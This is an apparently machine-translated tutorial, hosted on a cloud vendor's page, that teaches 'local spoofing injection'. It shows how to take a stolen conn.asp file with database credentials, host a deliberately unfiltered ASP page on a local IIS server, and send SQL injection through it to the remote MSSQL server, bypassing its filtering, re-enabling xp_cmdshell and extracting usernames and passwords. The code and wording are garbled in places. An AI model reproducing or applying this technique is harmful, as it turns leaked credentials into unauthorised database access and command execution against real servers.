What is local injection? Simply put, you cannot perform SQL Injection on the server because the WEB program on the server is safe and the request ("id") is strictly filtered, or restrict the input format to numbers. You can only discard the injection.
However, sometimes, you can inject data in the local IIS to inject data to the server, avoiding the server's request parameter submission and filtering. For example, if you accidentally hit the server and obtained the server's conn. asp file by exploiting a brute-force database or other vulnerabilities, congratulations! The intrusion is not far from success.
The conn. asp file code is generally as follows:
<%
Set conn = Server. CreateObject ("ADODB. Connection ")
Conn. Open "PROVIDER = SQLOLEDB; data source = 61.121.140.37; UID = admin; pwd = 12345; DATABASE = master"
%>
Some information about the server database is recorded here, and the connection password is usually obtained, which indicates that it is an MSSQL system and is very helpful. If the server has a URL that can be injected with SQL statements, restore xp_mongoshell and we can execute many commands. The doscommand is also free of charge. But unfortunately, we cannot inject it. Only such a conn. asp file can be used.
So, we will cheat the server on the local machine, but you need to know what web program the server uses, or you won't be able to write the code below. Let's write a sqltest. asp file without any filtering. put asp under wwwroot in your IIS so that you can access it through Localhost.
The sqltest. asp code is as follows:
<! -- # Include file = "conn. asp" -->
<%
Dim rs, strSQL, id
Set rs = server. createobject ("ADODB. recordset ")
Id = request ("id ")
StrSQL = "select * from DVBBSmdb where GuestID =" & id
Rs. open strSQL, conn, 1, 3
Rs. close
%>
The DVBBSmdb is a fictitious one. You need to change it to the Database Name of the web application database. No. The id submission parameters are not filtered and no replace or other functions are used. Now we enter the injection URL: http: // localhost/sqltest. asp? Id = 1. Then execute commands on the local server or run the username and password, which is equivalent to injecting on the server you want to intrude into, bypassing its anti-injection measures.
This is a local spoofing injection. Do you understand?
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
